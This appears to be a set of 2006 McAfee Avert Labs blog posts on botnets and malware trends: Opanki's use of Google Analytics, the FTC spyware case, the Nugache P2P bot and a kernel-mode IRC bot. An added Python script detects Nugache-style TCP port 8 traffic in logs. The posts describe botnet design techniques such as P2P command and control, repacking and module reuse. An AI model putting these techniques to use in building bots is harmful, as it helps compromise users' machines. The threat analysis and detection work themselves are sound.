Every day we see new things the miscreants develop to make their job easier. Today I was checking the 288th variant of Opanki. The really interesting thing about this one is that the botnet owner seems concerned about not having an organized way to track the bots, their geographic distribution for example. How can he or she accomplish this easily? Yes, Google Analytics! As many of you know, Google offers Google Analytics (www.google.com/analytics) as a free service that lets anyone collect and view tracking information about website visitors: unique visitor tracking, daily visitors, geo-location…

The following code was found in this bot variant. It is the typical snippet one would add to a web page to make Google Analytics work:

_uacct = "UA-XXXXXX-X";

_udn="xxxxxx.com";

urchinTracker();

_uacct and _udn are parameters that identify the site owner for the later statistics, so the same account ID can be used to tie a sample to an operator.

Yet another example of how the miscreants are organizing themselves…

McAfee Avert Labs releases first issue of Sage!!!!

An epic transformation in the world of security is upon us. Today, we released the first issue of our semi-annual security magazine, Sage. We will use it to deliver meaningful and sometimes raw content to the masses. We take our responsibility to protect the public from malicious actors very seriously and will not shy away from difficult content or taboo topics. Instead, we will share our day-to-day fight with the world and let you decide how important the concepts being broached are to you.

The premiere issue examines the use of open source by the malware writing community. We show the pivotal role that code sharing and full disclosure have played in the evolution of the threat environment, and we anticipate a surge in malware quality and reliability as the malware writers become more professional. Though open source cannot be blamed for how some unsavory individuals may choose to use its tools, techniques, and methodologies, the movement should acknowledge that there are dangers associated with some of its fundamental beliefs.

Sage is meant to be a forum for thought leadership and serious discourse on topical security issues. By drawing on the Labs wealth of data and expertise, and writing challenging security articles, we hope to provoke important discussion about the digital battlefield we have found ourselves in.

Get Sage now from the McAfee Threat Center site:

http://www.mcafee.com/us/threat_center/white_paper.html

“200,000!”

Rockets bursting in air, fireworks everywhere!  Thank you for helping mark the 200,000th entry into the VirusScan malware (malevolent software) detection database.

But truly, this is not a moment to celebrate. Ever larger quantities of malware are a plague, not a cause for celebration. Instead, we mark this moment simply as a milestone in our continual effort to fend off the bad stuff from everyone's machines.

It is alarming that we reach this milestone so soon after September 2004 when the count reached 100,000.  Eighteen years to reach 100,000.  Less than two years to double.  Looking ahead, our researchers expect yet another doubling in a similar timeframe.  So, 100,000 new threats in the past two years, 200,000 new threats to come in the next two years!

[Figure: Malware Count and Rate of Growth]

The last two years have marked a tremendous increase in downloaders and bots, malware whose purpose is to commandeer the target machine for use by a Command and Control machine.  Or rather, by the person sitting behind that machine, whose motive is $$$$$$$.

In early 2004, a number of viruses like Netsky, Bagle, and Mydoom would infect multiple millions of machines with each release of a new variant.  Many millions of machines would be compromised in a short amount of time causing great financial strife and immediate reaction from IT personnel as well as law enforcement.  Soon, Sven Jaschan was arrested for the creation of the Netsky and Sasser families of viruses.  At about the same time, the author of Gaobot/Agobot and Phatbot was also arrested.  With these two events, we all hoped the arrests would stem the tide on malware.

Instead, malware distribution changed dramatically.  In the first half of 2004, 31 virus outbreaks were rated Medium and above.  The second half of 2004 saw 17 more.  That number fell to 12 for the whole of 2005.  And in 2006, there have been no outbreaks of similar severity!  Instead of huge virus events causing ire from all segments including law enforcement, the preferred method of malware distribution now involves the creation of many minor variants sent through controlled spam efforts.  Good family detection becomes crucial for a less worrisome experience on the Internet.

Another area of concern is the growth of malware targeting mobile telephony.  The numbers are still small, only near 300.  As a result, rates of growth are exaggerated.  However, it will grow.  The worry is that, as our past experience with other forms of malware would suggest, the growth will follow a curve similar to the above graph, except that time will be compressed.  We are still in the era where malware targeting telephony is not yet purposefully stealing money.  And that is the concern.  When the phone becomes the standard means to transfer money, malware targeting telephony will truly explode, much as bots and other means to steal money over the Internet have consumed our energies these past two years.

And so, on this July 4th, our thanks to the men and women who serve, so we can all enjoy our liberties and pursue happiness.  And thanks also to the cadre of dedicated anti-malware researchers who on this day added that 200,000th malware detection entry, so we may pursue our enjoyment of the Internet experience with a little less worry.

“Vulnerabilities, spam and spyware”

In October 2004, the Federal Trade Commission started an investigation of reputed spammers. The story reached its conclusion on May 4th, 2006. Sanford Wallace (nicknamed Spamford) and his company, Smartbot.net, have to shut down their operation and give up more than $4 million in ill-gotten gains. Jared Lansky, an ad broker who disseminated ads containing Wallace's spyware, will give up $227,000 in ill-gotten gains.

The FTC alleged that Sanford Wallace and his company, Smartbot.Net, exploited a security vulnerability in Microsoft's Internet Explorer Web browser in order to distribute spyware. The spyware caused the CD-ROM tray on computers to open and then displayed a "FINAL WARNING!!" on the screen with a message that said:

"If your cd-rom drive's open . . .You DESPERATELY NEED to rid your system of spyware pop-ups IMMEDIATELY! Spyware programmers can control your computer hardware if you failed to protect your computer right at this moment! Download Spy Wiper NOW!" Spy Wiper and Spy Deleter, purported anti-spyware products the defendants promoted, sold for $30.

The official documents are available here:

May 4, 2006:

October 12, 2004:

  • Complaint for Injunction and Other Equitable Relief [PDF 34K]
  • Memorandum in Support of Plaintiff's Motion for a Temporary Restraining Order with Expedited Discovery, Preservation of Documents and Order to Show Cause Why a Preliminary Injunction Should Not Issue Against Defendants [PDF 68K]
  • News Release

W32/Nugache@MM IRC bot

A few interesting variants of an IRC bot, W32/Nugache@MM (see http://vil.nai.com/vil/content/v_139347.htm). Rather than resolving an IRC server via DNS and connecting back to it for commands, the bot attempts to create a P2P network, listening on port 8 (TCP). Initial execution results in outgoing connections to one of several IP addresses (on port 8 TCP), presumably some seeded infections to bootstrap the P2P network. The bot spreads via email, AIM, Windows Messenger and across the network.

One interesting aspect of this family is its (supposed) ability to repack itself. Though unconfirmed in replication testing thus far, reports suggest it attempts to repack itself prior to propagating. If true, this would create an interesting challenge for AV scanners.
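The network behaviour described above (a host that both listens on TCP port 8 and reaches out to several peers on TCP port 8) is something a defender can hunt for in firewall or flow logs. The following is an added example, not code from the original post or from Avert Labs: the log line format, the sample lines and the 10.0.0.0/8 "internal" range are all constructed for illustration, and only the port number comes from the post.

```python
"""Hunt for the TCP/8 peer-to-peer pattern described in the post.

Added example, not code from the original post. The log format and the
sample lines below are constructed; real firewall or netflow exports differ.
"""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed sample log: "<timestamp> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port>"
# 10.0.0.5 contacts three external peers on TCP/8 and also accepts an inbound
# connection on TCP/8; 10.0.0.9 is ordinary web traffic; 10.0.0.12 makes a single
# TCP/8 connection; the last line is deliberately malformed.
SAMPLE_LOG = """\
2006-05-01T10:00:01 TCP 10.0.0.5:1034 -> 203.0.113.10:8
2006-05-01T10:00:02 TCP 10.0.0.5:1035 -> 203.0.113.11:8
2006-05-01T10:00:05 TCP 10.0.0.5:1036 -> 203.0.113.12:8
2006-05-01T10:00:09 TCP 198.51.100.7:4455 -> 10.0.0.5:8
2006-05-01T10:00:12 TCP 10.0.0.5:1037 -> 203.0.113.10:8
2006-05-01T10:01:00 TCP 10.0.0.9:2200 -> 192.0.2.40:80
2006-05-01T10:01:03 TCP 10.0.0.9:2201 -> 192.0.2.40:443
2006-05-01T10:01:08 UDP 10.0.0.9:5353 -> 224.0.0.251:5353
2006-05-01T10:02:00 TCP 10.0.0.12:3100 -> 203.0.113.10:8
garbage line that should be skipped
"""

INTERNAL = ip_network("10.0.0.0/8")  # assumed internal range (constructed)
SUSPECT_PORT = 8                     # TCP port used by the bot's P2P layer (from the post)


@dataclass(frozen=True)
class Flow:
    ts: str
    proto: str
    src: str
    sport: int
    dst: str
    dport: int


def parse_flow(line):
    """Parse one log line into a Flow; return None for lines that do not fit."""
    parts = line.split()
    if len(parts) != 5 or parts[3] != "->":
        return None
    ts, proto, src_ep, _, dst_ep = parts
    try:
        src, sport = src_ep.rsplit(":", 1)
        dst, dport = dst_ep.rsplit(":", 1)
        ip_address(src)  # raises ValueError on a malformed address
        ip_address(dst)
        return Flow(ts, proto.upper(), src, int(sport), dst, int(dport))
    except ValueError:
        return None


def parse_log(text):
    """Parse a whole log, silently dropping unparseable lines."""
    return [f for f in (parse_flow(l) for l in text.splitlines()) if f is not None]


def find_p2p_candidates(flows, port=SUSPECT_PORT, min_peers=2):
    """Report internal hosts showing the P2P pattern on TCP/<port>.

    'high'   : host both accepts inbound connections on the port (it is listening)
               and initiates outbound connections to the port (peer seeking).
    'medium' : host only reaches out, but to at least min_peers distinct peers.
    A single outbound connection is not reported on its own.
    """
    outbound = defaultdict(set)  # internal host -> external peers it contacted
    inbound = defaultdict(set)   # internal host -> remote sources that reached it
    for f in flows:
        if f.proto != "TCP" or f.dport != port:
            continue
        if ip_address(f.src) in INTERNAL:
            outbound[f.src].add(f.dst)
        if ip_address(f.dst) in INTERNAL:
            inbound[f.dst].add(f.src)

    findings = {}
    for host in set(outbound) | set(inbound):
        peers = outbound.get(host, set())
        listening = bool(inbound.get(host))
        if listening and peers:
            findings[host] = {"severity": "high", "listening": True, "peers": sorted(peers)}
        elif len(peers) >= min_peers:
            findings[host] = {"severity": "medium", "listening": False, "peers": sorted(peers)}
    return findings


if __name__ == "__main__":
    for host, info in sorted(find_p2p_candidates(parse_log(SAMPLE_LOG)).items()):
        print(f"{host}: {info['severity']} (listening={info['listening']}, peers={info['peers']})")
```

Port 8 is not assigned to any common service, so even the "medium" case is worth a look, but the rule deliberately keys on the combination of accepting and initiating connections on the same unusual port, since that is what distinguishes a P2P node from a host that merely touched an odd port once.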

First Kernel Mode IRC bot?

A couple weeks ago we saw a blog posting by a person named tibbar claiming they had written the first kernel mode IRC bot. See http://tibbar.blog.co.uk/2006/04/06/kernel_mode_IRCbot~708256 for the announcement.

Is this really the first kernel mode bot? I think so, but it is purely a proof of concept with no teeth. What makes this announcement important in my eyes is that it illustrates two points that are very important when we look at the future production of bots and malware in general: use (and reuse) of open source components, and the increase in programmer skillsets.

This kernel bot was easily created because it utilized a kernel socket library written and placed in the public domain by Valerino on rootkit.com. As The Mythical Man-Month states, there is no silver bullet in software development, but the brass bullet is module reuse, which we are seeing more and more within malware. Would this kernel bot have been created if it weren't for the prebuilt components that were available?

The second important point is that the code organization of the project allows the IRC functionality of the kernel bot to be tested in user mode, where a lot of bot developers are more comfortable, therefore easing the development of variants with more IRC functionality. Is this a revolutionary ability? No, but it is more advanced than most bot developers. I believe the advancement of skillsets will lead to more destructive bots as more intelligent programmers spend time increasing bot code quality, advanced features (encrypted P2P using proper key exchange, for example) and test harnesses. Malware, bot development specifically, will start to exhibit the standard development life cycle seen in other open source projects such as Apache and Firefox.